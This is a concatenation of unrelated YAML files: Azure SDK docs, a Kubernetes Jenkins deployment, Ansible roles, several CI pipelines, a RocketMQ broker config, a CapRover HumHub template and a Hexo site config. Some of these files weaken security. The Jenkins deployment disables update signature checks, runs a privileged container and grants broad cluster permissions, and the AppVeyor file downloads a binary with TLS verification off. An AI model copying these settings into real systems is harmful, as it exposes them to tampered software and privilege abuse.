type: property
summary: "Plug-in de réseau utilisé pour la création du réseau de Kubernetes. Les valeurs possibles sont\_: «\_azure\_», «\_kubenet\_». Valeur par défaut\_: «\_kubenet\_»."
optional: true
syntax:
content: 'networkPlugin?: NetworkPlugin'
return:
type:
- '@azure/arm-containerservice.NetworkPlugin'
package: '@azure/arm-containerservice'
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.networkPolicy'
name: networkPolicy
fullName: networkPolicy
children: []
langs:
- typeScript
type: property
summary: "Stratégie de réseau utilisée pour la création du réseau de Kubernetes. Les valeurs possibles sont\_: «\_tricolore\_», «\_azure\_»"
optional: true
syntax:
content: 'networkPolicy?: NetworkPolicy'
return:
type:
- '@azure/arm-containerservice.NetworkPolicy'
package: '@azure/arm-containerservice'
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.podCidr'
name: podCidr
fullName: podCidr
children: []
langs:
- typeScript
type: property
summary: 'Plage d’adresse IP de notation CIDR à partir de laquelle attribuer les adresses IP de pod lorsque Kubernetes est utilisé. Valeur par défaut : ''10.244.0.0/16''.'
optional: true
syntax:
content: 'podCidr?: undefined | string'
return:
type:
- undefined | string
package: '@azure/arm-containerservice'
- uid: '@azure/arm-containerservice.ContainerServiceNetworkProfile.serviceCidr'
name: serviceCidr
fullName: serviceCidr
children: []
langs:
- typeScript
type: property
summary: 'Plage d’adresses IP de notation CIDR à partir de laquelle attribuer des adresses IP de cluster de service. Elle ne doit empiéter sur aucune plage d’adresses IP de sous-réseau. Valeur par défaut : ''10.0.0.0/16''.'
optional: true
syntax:
content: 'serviceCidr?: undefined | string'
return:
type:
- undefined | string
package: '@azure/arm-containerservice'
references:
- uid: '@azure/arm-containerservice.NetworkPlugin'
name: NetworkPlugin
spec.typeScript:
- name: NetworkPlugin
fullName: NetworkPlugin
uid: '@azure/arm-containerservice.NetworkPlugin'
- uid: '@azure/arm-containerservice.NetworkPolicy'
name: NetworkPolicy
spec.typeScript:
- name: NetworkPolicy
fullName: NetworkPolicy
uid: '@azure/arm-containerservice.NetworkPolicy'
|
docs-ref-autogen/@azure/arm-containerservice/ContainerServiceNetworkProfile.yml
|
apiVersion: v1
kind: PersistentVolume
metadata:
name: jenkins-pv
spec:
storageClassName: local # Local PV
capacity:
storage: 2Gi
volumeMode: Filesystem
accessModes:
- ReadWriteOnce
local:
path: /var/lib/k8s/jenkins
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- ghost.com
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: jenkins-pvc
namespace: kube-ops
spec:
storageClassName: local
accessModes:
- ReadWriteOnce
resources:
requests:
storage: 2Gi
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jenkins
namespace: kube-ops
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
name: jenkins
rules:
- apiGroups: ["extensions", "apps"]
resources: ["deployments", "ingresses"]
verbs: ["create", "delete", "get", "list", "watch", "patch", "update"]
- apiGroups: [""]
resources: ["services"]
verbs: ["create", "delete", "get", "list", "watch", "patch", "update"]
- apiGroups: [""]
resources: ["pods"]
verbs: ["create", "delete", "get", "list", "patch", "update", "watch"]
- apiGroups: [""]
resources: ["pods/exec"]
verbs: ["create", "delete", "get", "list", "patch", "update", "watch"]
- apiGroups: [""]
resources: ["pods/log", "events"]
verbs: ["get", "list", "watch"]
- apiGroups: [""]
resources: ["secrets"]
verbs: ["get"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: jenkins
namespace: kube-ops
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: jenkins
subjects:
- kind: ServiceAccount
name: jenkins
namespace: kube-ops
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: jenkins
namespace: kube-ops
spec:
selector:
matchLabels:
app: jenkins
template:
metadata:
labels:
app: jenkins
spec:
serviceAccount: jenkins
initContainers:
- name: fix-permissions
image: busybox
command: ["sh", "-c", "chown -R 1000:1000 /var/jenkins_home"]
securityContext:
privileged: true
volumeMounts:
- name: jenkinshome
mountPath: /var/jenkins_home
containers:
- name: jenkins
image: jenkins/jenkins:lts
imagePullPolicy: IfNotPresent
env:
- name: JAVA_OPTS
value: -Dhudson.model.DownloadService.noSignatureCheck=true
ports:
- containerPort: 8080
name: web
protocol: TCP
- containerPort: 50000
name: agent
protocol: TCP
resources:
limits:
cpu: 1500m
memory: 2048Mi
requests:
cpu: 1500m
memory: 2048Mi
readinessProbe:
httpGet:
path: /login
port: 8080
initialDelaySeconds: 60
timeoutSeconds: 5
failureThreshold: 12
volumeMounts:
- name: jenkinshome
mountPath: /var/jenkins_home
volumes:
- name: jenkinshome
persistentVolumeClaim:
claimName: jenkins-pvc
---
apiVersion: v1
kind: Service
metadata:
name: jenkins
namespace: kube-ops
labels:
app: jenkins
spec:
selector:
app: jenkins
ports:
- name: web
port: 8080
targetPort: web
- name: agent
port: 50000
targetPort: agent
# ---
# apiVersion: extensions/v1beta1
# kind: Ingress
# metadata:
# name: jenkins
# namespace: kube-ops
# spec:
# rules:
# - host: jenkins.k8s.local
# http:
# paths:
# - backend:
# serviceName: jenkins
# servicePort: web
---
apiVersion: traefik.containo.us/v1alpha1
kind: IngressRoute
metadata:
name: jenkins
namespace: kube-ops
spec:
entryPoints:
- web
routes:
- kind: Rule
match: Host(`jenkins.k8s.local`)
services:
- name: jenkins
port: 8080
|
jenkins.yaml
|
---
# tasks file for ajeleznov.oracle-jdk ansible role
# The Oracle JDK rpm file will be downloaded from repository and installed in the default location under /usr/java
- name: "Debug output for role parameters"
tags: "oracle-jdk"
debug:
msg: "Running with delete_other_installations={{ delete_other_installations }}, old package name={{ java_version }}, new package name={{ package_newname }}"
verbosity: 1
- name: "Check if java_version has a valid value"
tags: "oracle-jdk"
fail:
msg: "java_version = {{ java_version }} is not a valid value"
with_items: "{{ java_versions }}"
when: java_version not in java_versions
- name: "Delete other Oracle JDK packages with name jdk1.X.0_X"
tags: "remove-oracle-jdk"
yum:
name: "{{ item }}"
state: absent
with_items:
- "{{ java_versions | difference(java_version) }}"
when: delete_other_installations
become: True
- name: "Delete other Oracle JDK packages with name jdk1.X"
tags: "remove-oracle-jdk"
yum:
name: "{{ item }}"
state: absent
with_items:
- "{{ package_newname }}"
when: delete_other_installations and
java_version not in new_packages
become: True
- name: "Check for installed Oracle JDK with name {{ java_version }}"
tags: "oracle-jdk"
yum:
list: "{{ java_version }}"
register: package_status
- name: "Output the results if {{ java_version }} is installed"
tags: "oracle-jdk"
debug:
msg: "A package {{ java_version }} is already installed."
verbosity: 1
when: package_status.results[0] is defined
- name: "Check for installed Oracle JDK with name jdk1.X"
tags: "oracle-jdk"
yum:
list: "{{ package_newname }}"
register: package_newname_status
- name: "Output the results if {{ package_newname }} is installed"
tags: "oracle-jdk"
debug:
msg: "A package {{ package_newname }} is already installed with a version {{ package_newname_status.results[0].version }}."
verbosity: 1
when: package_newname_status.results[0] is defined
- name: "Set a version for a package jdk1.X"
tags: "oracle-jdk"
set_fact:
installed_version: "jdk{{ package_newname_status.results[0].version }}"
when: package_newname_status.results[0] is defined
- name: "Set a version for a package jdk1.X if first attepmt not succeded"
set_fact:
installed_version: "N/A"
when: package_newname_status.results[0] is not defined and
java_version in new_packages
# the other versions have been deinstalled
- name: "Download Oracle JDK rpm file"
tags: "oracle-jdk"
get_url:
url: "{{ jdk_download_url }}/{{ jdk_rpm_file }}"
dest: "{{ workspace }}"
when: ( java_version in new_packages and java_version != installed_version ) or
( java_version not in new_packages and package_status.results|length == 0 )
- name: "Install Oracle JDK rpm file"
tags: "oracle-jdk"
yum:
name: "{{workspace}}/{{jdk_rpm_file}}"
state: installed
allow_downgrade: "{{ allow_downgrade }}"
when: ( java_version in new_packages and java_version != installed_version ) or
( java_version not in new_packages and package_status.results|length == 0 )
become: True
- name: "Delete downloaded file"
tags: "oracle-jdk"
file:
path: "{{workspace}}/{{jdk_rpm_file}}"
state: absent
when: ( java_version in new_packages and java_version != installed_version ) or
( java_version not in new_packages and package_status.results|length == 0 )
- name: "Test java command"
tags: "oracle-jdk"
command: "/usr/java/default/bin/java -version"
register: jdk_output
- name: "Output the results"
tags: "oracle-jdk"
debug:
var: jdk_output.stderr
verbosity: 1
|
tasks/main.yml
|
version: 2
jobs:
build_front:
machine:
enabled: true
steps:
- run: npm install
# - run: npm run deploy
api_test:
parallelism: 3
docker:
- image: circleci/ruby:2.3.5-node-browsers
environment:
BUNDLE_JOBS: 3
BUNDLE_RETRY: 3
BUNDLE_PATH: vendor/bundle
PGHOST: 127.0.0.1
RAILS_ENV: test
- image: circleci/postgres:9.5-alpine
steps:
- checkout
- run: bundle install --path vendor/bundle
- run: bundle exec rake db:create db:schema:load db:migrate
- run:
name: Run request specs
command: bundle exec rspec spec/requests
- run:
name: Run model specs
command: bundle exec rspec spec/models
deploy_staging:
machine:
enabled: true
steps:
- checkout
- run:
name: Deploy to Heroku
command: |
git push https://heroku:$HEROKU_API_KEY<EMAIL>/$HEROKU_APP_NAME.git staging
- run:
name: Migrate DB
command: |
heroku run rake db:migrate --app $HEROKU_APP_NAME
- run:
name: Restart the app
command: |
heroku restart --app $HEROKU_APP_NAME
deploy_master:
machine:
enabled: true
steps:
- checkout
- run:
name: Deploy to Heroku
command: |
git push https://heroku:$HEROKU_API_KEY@<EMAIL>.com/$HEROKU_APP_NAME.git
- run:
name: Migrate DB
command: |
heroku run rake db:migrate --app $HEROKU_APP_NAME
- run:
name: Restart the app
command: |
heroku restart --app $HEROKU_APP_NAME
workflows:
version: 2
build-and-deploy:
jobs:
- api_test
- build_front
- deploy_staging:
requires:
- api_test
filters:
branches:
only: staging
- deploy_master:
requires:
- api_test
filters:
branches:
only: master
|
.circleci/config.yml
|
---
- name: install dependencies
apt:
name: "{{ cacti_plugin_percona_dependencies }}"
state: "{{ apt_install_state | default('latest') }}"
update_cache: true
cache_valid_time: "{{ apt_update_cache_valid_time | default(3600) }}"
tags:
- configuration
- cacti-plugin-percona
- cacti-plugin-percona-dependencies
- name: create directories
file:
path: "{{ item }}"
state: directory
owner: root
group: root
mode: 0755
with_items:
- "{{ cacti_plugin_percona_checkout_path | dirname }}"
- "{{ cacti_plugin_percona_config_path }}"
tags:
- configuration
- cacti-plugin-percona
- cacti-plugin-percona-directories
- cacti-plugin-percona-directories-create
- name: checkout repository
git:
repo: "{{ cacti_plugin_percona_git_repo }}"
dest: "{{ cacti_plugin_percona_checkout_path }}"
version: "{{ cacti_plugin_percona_git_version }}"
force: true
register: _git_checkout
tags:
- configuration
- cacti-plugin-percona
- cacti-plugin-percona-checkout
- block:
- name: patch pmp-cacti-template
lineinfile:
path: "{{ cacti_plugin_percona_checkout_path }}/cacti/bin/pmp-cacti-template"
regexp: '^our\ \$SVN_REV\ \=\ .*\;$'
line: 'our $SVN_REV = 42;'
tags:
- cacti-plugin-percona-templates
- cacti-plugin-percona-templates-patch
- cacti-plugin-percona-templates-patch-pmp-cacti-template
- name: patch make.sh
lineinfile:
path: "{{ cacti_plugin_percona_checkout_path }}/make.sh"
line: 'exit;'
insertbefore: '^\#\ Generate\ Zabbix'
tags:
- cacti-plugin-percona-templates
- cacti-plugin-percona-templates-patch
- cacti-plugin-percona-templates-patch-make-sh
- name: make templates
command: >
./make.sh
args:
chdir: "{{ cacti_plugin_percona_checkout_path }}"
tags:
- cacti-plugin-percona-templates
- cacti-plugin-percona-templates-make
- name: import templates
shell: >
true \
&& test -f {{ cacti_plugin_percona_import_template_php_path }} \
&& find {{ cacti_plugin_percona_release_path }}/templates \
-name '*.xml' \
-print0 | \
xargs -0 --no-run-if-empty -L1 -i'{}' \
php {{ cacti_plugin_percona_import_template_php_path }} --filename='{}' {{ cacti_plugin_percona_import_template_php_options | join(' ') }}
args:
chdir: "{{ cacti_plugin_percona_checkout_path }}"
warn: false
tags:
- cacti-plugin-percona-templates
- cacti-plugin-percona-templates-import
- name: install scripts
shell: >
true \
&& test -d {{ cacti_plugin_percona_release_path }}/scripts/ \
&& test -d {{ cacti_plugin_percona_scripts_path }}/ \
&& rsync \
-ai --checksum --delete \
--chown=root:root \
{{ cacti_plugin_percona_release_path }}/scripts/ss_* \
{{ cacti_plugin_percona_scripts_path }}/
args:
warn: false
register: _scripts_copy
changed_when: _scripts_copy.stdout_lines | length > 0
tags:
- cacti-plugin-percona-scripts
- cacti-plugin-percona-scripts-install
- name: cleanup
shell: >
git reset --hard && git clean -d -x -f
args:
chdir: "{{ cacti_plugin_percona_checkout_path }}"
tags:
- cacti-plugin-percona-cleanup
- cacti-plugin-percona-cleanup-build
when: _git_checkout is changed
tags:
- configuration
- cacti-plugin-percona
- name: update configuration files
template:
src: "{{ item.lstrip('/') }}.j2"
dest: "{{ item }}"
owner: "{{ cacti_plugin_percona_ss_get_x_php_cnf_user }}"
group: "{{ cacti_plugin_percona_ss_get_x_php_cnf_group }}"
mode: "{{ cacti_plugin_percona_ss_get_x_php_cnf_mode }}"
with_items:
- "{{ cacti_plugin_percona_ss_get_by_ssh_php_cnf_file }}"
- "{{ cacti_plugin_percona_ss_get_mysql_stats_php_cnf_file }}"
tags:
- configuration
- cacti-plugin-percona
- cacti-plugin-percona-scripts
- cacti-plugin-percona-scripts-configure
|
tasks/main.yml
|
name: Javascript Lint
on: pull_request
jobs:
changes:
runs-on: ubuntu-latest
outputs:
services: ${{ steps.filter.outputs.changes }}
steps:
- uses: dorny/paths-filter@v2
id: filter
with:
token: ${{ github.token }}
filters: |
gateway:
- "gateway/**"
frontend:
- "frontend/**"
association-frontend:
- "association-frontend/**"
lint:
runs-on: ubuntu-latest
needs: [changes]
if: ${{ needs.changes.outputs.services != '[]' && needs.changes.outputs.services != '' }}
strategy:
fail-fast: false
matrix:
service: ${{ fromJSON(needs.changes.outputs.services) }}
defaults:
run:
working-directory: ./${{ matrix.service }}
steps:
- uses: actions/checkout@v2
- uses: actions/setup-node@v2
with:
node-version: '14'
- name: Cache dependencies
uses: actions/cache@v1
id: cache
with:
path: ./node_modules
key: node_modules-${{ matrix.service }}-${{ hashFiles('yarn.lock') }}-v3
- name: Install dependencies
run: yarn install
- name: Codegen
if: ${{ matrix.service == 'frontend' || matrix.service == 'association-frontend' }}
run: yarn run codegen
- name: Lint
run: yarn run lint
- name: TS Lint
run: yarn run lint:ts
- name: Prettier
run: yarn run lint:prettier
tests:
runs-on: ubuntu-latest
needs: [changes]
if: ${{ needs.changes.outputs.services != '[]' && needs.changes.outputs.services != '' }}
strategy:
fail-fast: false
matrix:
service: ${{ fromJSON(needs.changes.outputs.services) }}
defaults:
run:
working-directory: ./${{ matrix.service }}
steps:
- uses: actions/checkout@v2
- uses: actions/setup-node@v2
with:
node-version: '14'
- name: Cache dependencies
uses: actions/cache@v1
id: cache
with:
path: ./node_modules
key: node_modules-${{ matrix.service }}-${{ hashFiles('yarn.lock') }}-v3
- name: Install dependencies
run: yarn install
- name: Codegen
if: ${{ matrix.service == 'frontend' || matrix.service == 'association-frontend' }}
run: yarn run codegen
- name: Unit tests
run: yarn run test
|
.github/workflows/javascript-lint.yml
|
image: Visual Studio 2017
clone_folder: c:\gopath\src\github.com\devopsdays\devopsdays-cli
# set to false to build on any commit.
skip_non_tags: true
environment:
# improve readability
VCS_URL: https://github.com/%APPVEYOR_REPO_NAME%
GH_USER: "%APPVEYOR_ACCOUNT_NAME%"
VERSION: "%APPVEYOR_REPO_TAG_NAME%"
# specific to go
GOPATH: c:\gopath
# specific to bintray
JFROG_CLI_OFFER_CONFIG: false
# define secure tokens
CHOCOKEY:
secure: "%CHOCOKEY%"
BT_KEY:
secure: <KEY>
GH_TOKEN:
secure: <KEY>
# prepare system and project
install:
# install required software
- choco source add -n=mh-cbon -s="https://api.bintray.com/nuget/mh-cbon/choco"
- choco install changelog gh-api-cli go-msi -y
- refreshenv
# to test the build on non tag commits.
- if "%x%"=="%VERSION%" set VERSION=1.0.2
# ensure wix is available in PATH
- set PATH=%WIX%\bin;%PATH%
# fetch bintray client
- curl -fsSk -o jfrog.exe -L "https://api.bintray.com/content/jfrog/jfrog-cli-go/$latest/jfrog-cli-windows-amd64/jfrog.exe?bt_package=jfrog-cli-windows-amd64"
# specific to go
- set PATH=%GOPATH%\bin;%PATH%
- go get -u github.com/mh-cbon/never-fail
- go get -u github.com/Masterminds/glide
- go get -u github.com/aktau/github-release
# test_script:
# # - go test ./...
# - go run main.go
# build msi artifacts
build_script:
# build the program for x386 arch
- go get ./...
- set GOARCH=386
- go build -o %APPVEYOR_PROJECT_NAME%.exe --ldflags "-X cmd.Version=%VERSION%" main.go
# generate the x386 MSI package
- go-msi make --msi %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi --version %VERSION% --arch %GOARCH%
# build a cross platform x386 nuget package.
- go-msi choco --path wix.json --version %VERSION% --input %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi --version %VERSION%"
# build the program for amd64 arch
- set GOARCH=amd64
- go build -o %APPVEYOR_PROJECT_NAME%.exe --ldflags "-X cmd.Version=%VERSION%" main.go
# generate the amd64 MSI package
- go-msi make --msi %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi --version %VERSION% --arch %GOARCH%
- pwd
- dir
# configure the artifacts to upload to the github release page
artifacts:
- path: 'devopsdays-cli-386-*.msi'
name: msi-x86
- path: 'devopsdays-cli-amd64-*.msi'
name: msi-x64
# setup the github release page upload
deploy:
provider: GitHub
release: devopsdays-cli-v$(VERSION)
tag: $(appveyor_repo_tag_name)
artifact: msi-x86, msi-x64
force_update: true
draft: false
prerelease: true
auth_token:
secure: <KEY>PRpfP
on:
appveyor_repo_tag: true
# deploy the nuget/msi packages to bintray
after_build:
- set GOARCH=386
# - github-release info -s "%GH_TOKEN" -u devopsdays -r devopsdays-cli -t "0.7.36"
# - github-release upload -s "%GH_TOKEN" -u "devopsdays" -r "devopsdays-cli" -t "0.7.36" -f "%APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi" -n "%APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi"
# setup both "choco" and "msi" repositories on bintray
# - never-fail jfrog bt pc --user mattstratton --key %BT_KEY% --licenses=MIT --vcs-url=https://github.com/%APPVEYOR_REPO_NAME%/ devopsdays/msi/%APPVEYOR_PROJECT_NAME%
# - never-fail jfrog bt pc --user mattstratton --key %BT_KEY% --licenses=MIT --vcs-url=https://github.com/%APPVEYOR_REPO_NAME%/ devopsdays/choco/%APPVEYOR_PROJECT_NAME%
# upload the nupkg
- jfrog bt upload --user mattstratton --key %BT_KEY% --override=true --publish=true %APPVEYOR_PROJECT_NAME%.%VERSION%.nupkg devopsdays/choco/%APPVEYOR_PROJECT_NAME%/%VERSION%
# upload the x386 msi artifact
- set GOARCH=386
- jfrog bt upload --user mattstratton --key %BT_KEY% --override=true --publish=true %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi devopsdays/msi/%APPVEYOR_PROJECT_NAME%/%VERSION%
# upload the amd64 msi artifact
- set GOARCH=amd64
- jfrog bt upload --user mattstratton --key %BT_KEY% --override=true --publish=true %APPVEYOR_PROJECT_NAME%-%GOARCH%-%VERSION%.msi devopsdays/msi/%APPVEYOR_PROJECT_NAME%/%VERSION%
|
appveyor.yml
|
Skip to content
Search or jump to…
Pull requests
Issues
Marketplace
Explore
@ossdev07
0
091ossdev07/constructor
forked from conda/constructor
Code Pull requests 0 Actions Projects 0 Wiki Security Insights Settings
constructor/.travis.yml
@msarahan msarahan remove support for conda less than 4.6
44d73bd on Aug 9, 2019
@msarahan@ne<EMAIL> <PASSWORD>@<EMAIL>
82 lines (70 sloc) 2.06 KB
# https://travis-ci.org/conda/constructor
language: python
sudo: false
branches:
only:
- master
env:
global:
- CONSTRUCTOR_CACHE=/tmp/constructor_travis_ci
matrix:
include:
# Linux
- os: linux
language: generic
env: PYTHON_VERSION=3.6 CONDA_VERSION=4.6
- os: linux
language: generic
env: PYTHON_VERSION=2.7 CONDA_CANARY=true
- os: linux
language: generic
env: PYTHON_VERSION=3.7 CONDA_CANARY=true
# OSX
- os: osx
language: generic
env: PYTHON_VERSION=3.6 CONDA_VERSION=4.7
allow_failures:
- os: linux
language: generic
env: PYTHON_VERSION=3.7 CONDA_CANARY=true
- os: linux
language: generic
env: PYTHON_VERSION=2.7 CONDA_CANARY=true
cache:
directories:
- $HOME/condacache/pkgs
- $HOME/.cache/pip
install:
- mkdir -p $HOME/condacache/pkgs
# Install latest miniconda
- if [[ "$TRAVIS_OS_NAME" == "linux" ]]; then
wget https://repo.anaconda.com/pkgs/misc/conda-execs/conda-latest-linux-64.exe -O conda.exe;
else
wget https://repo.anaconda.com/pkgs/misc/conda-execs/conda-latest-osx-64.exe -O conda.exe;
fi
- chmod +x conda.exe
- export CONDA_PKGS_DIRS="~/condacache/pkgs"
- export CONDA_ALWAYS_YES="true"
- export CONDA_AUTO_UPDATE_CONDA="false"
- if [ "${CONDA_CANARY}" = "true" ]; then
./conda.exe config --add channels conda-canary;
./conda.exe update conda.exe;
./conda.exe create -y -q -n test conda python=3.7;
else
./conda.exe create -y -q -p ~/miniconda -c conda-canary conda=$CONDA_VERSION python=$PYTHON_VERSION;
fi
- ./conda.exe install -n test pillow>=3.1 ruamel_yaml conda-forge::codecov pytest pytest-cov
- source "$HOME"/miniconda/bin/activate test
# Install this package
- pip install --user .
# this needs
- mkdir $HOME/miniconda/standalone_conda
- cp conda.exe $HOME/miniconda/standalone_conda/conda.exe
# diagnostics
- conda info
- conda init
- source "$HOME"/miniconda/bin/activate
- conda list
script:
- pytest --cov=constructor constructor
- python scripts/run_examples.py
after_success:
- codecov
© 2020 GitHub, Inc.
Terms
Privacy
Security
Status
Help
Contact GitHub
Pricing
API
Training
Blog
About
|
.travis.yml
|
uid: "com.azure.core.amqp.implementation.ReactorReceiver"
fullName: "com.azure.core.amqp.implementation.ReactorReceiver"
name: "ReactorReceiver"
nameWithType: "ReactorReceiver"
summary: "Handles receiving events from Event Hubs service and translating them to proton-j messages."
inheritances:
- "<xref href=\"java.lang.Object\" data-throw-if-not-resolved=\"False\" />"
inheritedMembers:
- "java.lang.Object.clone()"
- "java.lang.Object.equals(java.lang.Object)"
- "java.lang.Object.finalize()"
- "java.lang.Object.getClass()"
- "java.lang.Object.hashCode()"
- "java.lang.Object.notify()"
- "java.lang.Object.notifyAll()"
- "java.lang.Object.toString()"
- "java.lang.Object.wait()"
- "java.lang.Object.wait(long)"
- "java.lang.Object.wait(long,int)"
syntax: "public class ReactorReceiver implements AmqpReceiveLink"
constructors:
- "com.azure.core.amqp.implementation.ReactorReceiver.ReactorReceiver(java.lang.String,org.apache.qpid.proton.engine.Receiver,com.azure.core.amqp.implementation.handler.ReceiveLinkHandler,com.azure.core.amqp.implementation.TokenManager,com.azure.core.amqp.implementation.ReactorDispatcher)"
methods:
- "com.azure.core.amqp.implementation.ReactorReceiver.addCredits(int)"
- "com.azure.core.amqp.implementation.ReactorReceiver.decodeDelivery(org.apache.qpid.proton.engine.Delivery)"
- "com.azure.core.amqp.implementation.ReactorReceiver.dispose()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getCredits()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getEndpointStates()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getEntityPath()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getHostname()"
- "com.azure.core.amqp.implementation.ReactorReceiver.getLinkName()"
- "com.azure.core.amqp.implementation.ReactorReceiver.isDisposed()"
- "com.azure.core.amqp.implementation.ReactorReceiver.receive()"
- "com.azure.core.amqp.implementation.ReactorReceiver.setEmptyCreditListener(java.util.function.Supplier<java.lang.Integer>)"
- "com.azure.core.amqp.implementation.ReactorReceiver.toString()"
type: "class"
implements:
- "<xref href=\"com.azure.core.amqp.implementation.AmqpReceiveLink?alt=com.azure.core.amqp.implementation.AmqpReceiveLink&text=AmqpReceiveLink\" data-throw-if-not-resolved=\"False\" />"
metadata: {}
package: "com.azure.core.amqp.implementation"
artifact: com.azure:azure-core-amqp:1.7.0-beta.2
|
preview/docs-ref-autogen/com.azure.core.amqp.implementation.ReactorReceiver.yml
|
apiVersion: v1
kind: ConfigMap
metadata:
name: broker-config
data:
broker.conf: |
#所属集群名字
brokerClusterName=DefaultCluster
#broker名字,注意此处不同的配置文件填写的不一样,如果在broker-a.properties使用:broker-a,
#在broker-b.properties使用:broker-b
brokerName=broker-a
#0 表示Master,>0 表示Slave
brokerId=0
#nameServer地址,分号分割
#namesrvAddr=rocketmq-0:9876;rocketmq-1:9876
namesrvAddr=rocketmq:9876
#启动IP,如果 docker 报 com.alibaba.rocketmq.remoting.exception.RemotingConnectException: connect to <192.168.0.120:10909> failed
# 解决方式1 加上一句producer.setVipChannelEnabled(false);,解决方式2 brokerIP1 设置宿主机IP, 不要使用docker 内部IP
#brokerIP1=192.168.0.254
#在发送消息时,自动创建服务器不存在的topic,默认创建的队列数
defaultTopicQueueNums=4
#是否允许 Broker 自动创建Topic,建议线下开启,线上关闭 !!!这里仔细看是false,false,false
autoCreateTopicEnable=true
#是否允许 Broker 自动创建订阅组,建议线下开启,线上关闭
autoCreateSubscriptionGroup=true
#Broker 对外服务的监听端口
listenPort=10911
#haService中使用 默认值为:listenPort + 1
#haListenPort=10912
#主要用于slave同步master listenPort - 2
#fastListenPort=10909
#删除文件时间点,默认凌晨4点
deleteWhen=04
#文件保留时间,默认48小时
fileReservedTime=120
#commitLog每个文件的大小默认1G
mapedFileSizeCommitLog=1073741824
#ConsumeQueue每个文件默认存30W条,根据业务情况调整
mapedFileSizeConsumeQueue=300000
#destroyMapedFileIntervalForcibly=120000
#redeleteHangedFileInterval=120000
#检测物理文件磁盘空间
diskMaxUsedSpaceRatio=88
#存储路径
storePathRootDir=/opt/store
#commitLog 存储路径
#storePathCommitLog=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/commitlog
#消费队列存储
#storePathConsumeQueue=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/consumequeue
#消息索引存储路径
#storePathIndex=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/index
#checkpoint 文件存储路径
#storeCheckpoint=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/checkpoint
#abort 文件存储路径
#abortFile=/home/ztztdata/rocketmq-all-4.1.0-incubating/store/abort
#限制的消息大小
maxMessageSize=65536
#flushCommitLogLeastPages=4
#flushConsumeQueueLeastPages=2
#flushCommitLogThoroughInterval=10000
#flushConsumeQueueThoroughInterval=60000
#Broker 的角色
#- ASYNC_MASTER 异步复制Master
#- SYNC_MASTER 同步双写Master
#- SLAVE
brokerRole=ASYNC_MASTER
#刷盘方式
#- ASYNC_FLUSH 异步刷盘
#- SYNC_FLUSH 同步刷盘
flushDiskType=ASYNC_FLUSH
#发消息线程池数量
#sendMessageThreadPoolNums=128
#拉消息线程池数量
#pullMessageThreadPoolNums=128
|
single-node/broker-cm.yaml
|
captainVersion: 4
services:
$$cap_appname-db:
image: mysql:5.7
volumes:
- $$cap_appname-db-data:/var/lib/mysql/
environment:
MYSQL_DATABASE: $$cap_mysql_database_name
MYSQL_ROOT_PASSWORD: $$cap_mysql_root_passwd
MYSQL_USER: $$cap_mysql_user
MYSQL_PASSWORD: <PASSWORD>
restart: always
caproverExtra:
notExposeAsWebApp: 'true'
$$cap_appname:
environment:
# The DB vars are only used if HUMHUB_AUTO_INSTALL is enabled
# However this is a shady feature so we choose to disable it by default
HUMHUB_AUTO_INSTALL: $$cap_humhub_auto_install
HUMHUB_DB_HOST: srv-captain--$$cap_appname-db
HUMHUB_DB_NAME: $$cap_mysql_database_name
HUMHUB_DB_USER: $$cap_mysql_user
HUMHUB_DB_PASSWORD: <PASSWORD>
HUMHUB_HOST: $$cap_appname.$$cap_root_domain
HUMHUB_PROTO: https
image: mriedmann/humhub:$$cap_humhub_version
restart: always
volumes:
- '$$cap_appname-config:/var/www/localhost/htdocs/protected/config'
- '$$cap_appname-uploads:/var/www/localhost/htdocs/uploads'
- '$$cap_appname-modules:/var/www/localhost/htdocs/protected/modules'
caproverOneClickApp:
variables:
- label: Database Root Password
description: Password to manage to the database
defaultValue: $$cap_gen_random_hex(16)
id: $$cap_mysql_root_passwd
- label: Database Name
description: The name of humhub db
defaultValue: humhub
id: $$cap_mysql_database_name
- label: Database User
description: The username to for humhub to connect to database
defaultValue: humhub
id: $$cap_mysql_user
- label: Database Password
description: Password to connect to the database
defaultValue: $$cap_gen_random_hex(16)
id: $$cap_mysql_passwd
- id: $$cap_humhub_version
label: Version Tag
description: Check out their Docker page for the valid tags https://hub.docker.com/r/mriedmann/humhub/tags
defaultValue: '1.6.2'
- id: $$cap_humhub_protocol
label: Server protocol
description: Use http if you don't want to enable secure connection
defaultValue: 'https'
- id: $$cap_humhub_auto_install
label: AutoSetup
description: If this is set to false (advised) you will have to provide the DB creds on first run.
defaultValue: 'false'
instructions:
start: |-
HumHub is an open source social network
GitHub: https://github.com/humhub/humhub
end: |-
All done. The first time you access the instance you will be requested to input the db details.
The database host is srv-captain--$$cap_appname-db and the password and user will be the ones you chose
IMPORTANT: The default protocol is HTTPS, so please turn on HTTPS!
displayName: HumHub
isOfficial: false
description: A open source social media network
documentation: https://github.com/humhub/humhub
|
public/v4/apps/humhub.yml
|
# Site
title: 胡金波的博客
subtitle: 记录生活点滴,分享学习心得
description: 享受编程和技术所带来的快乐
keywords: 软件开发,编程技术,IT技术,Java,JavaScript,Linux,大数据,云计算
author: 胡金波
language: zh-CN
timezone: Asia/Shanghai
# URL
## If your site is put in a subdirectory, set url as 'http://yoursite.com/child' and root as '/child/'
url: https://hujinbo.me
root: /
